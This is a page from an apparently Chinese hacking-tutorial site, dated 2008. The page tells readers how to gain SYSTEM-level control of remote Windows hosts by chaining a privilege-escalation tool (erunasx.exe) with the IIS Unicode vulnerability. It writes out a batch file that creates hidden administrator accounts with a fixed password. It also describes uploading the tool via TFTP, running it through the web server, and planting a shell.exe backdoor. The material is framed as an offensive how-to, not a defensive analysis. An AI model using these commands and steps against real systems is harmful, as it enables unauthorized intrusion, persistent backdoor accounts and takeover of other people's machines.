| Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法 |
| 作者:内详 来源:网络搜集 点击数:
更新时间:2008-3-31 18:11:14 |
|
|
"net localgroup administrators test /add"
二.远程的主机
1.如果想在远程的主机上通过普通的用户(test)拿到system权限的,可以结合一些漏洞比如:一些iis漏洞
我们以unicode漏洞为例。
首先在本地构造一个构造一个bat文件名字为:boy.bat
net user test doudou /add-----------加个用户密码为:doudou
net localgroup administrators test /add ------ 添加到本地管理员组
net user boy doudou /add --------------再加一个用户密码为:doudou
net localgroup administrators boy /add --------同样添加到本地管理员组
我们做好这些之后,利用unicode漏洞tFTP上去erunasx.exe erunasx.dll 和上面描述的bat文件。
易县门户网http://www.yxdoor.com
至于你能否上传成功,那要看你自己了。
上传成功之后然后想办法通过iis在web
浏览器运行命令erunasx.exe t.bat 然后就添加了我们在bat文件中制定的
test用户。经过流光的种植者测试上传了一个shell.exe。
现在unicode漏洞也好用了上一页 [1] [2] [3] [4] 下一页
|
|
| 教程录入:yxdoor 责任编辑:yxdoor |
上一篇教程: 揭密windows系统目录功能
下一篇教程: 从管理角度谈病毒与数据安全 |
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
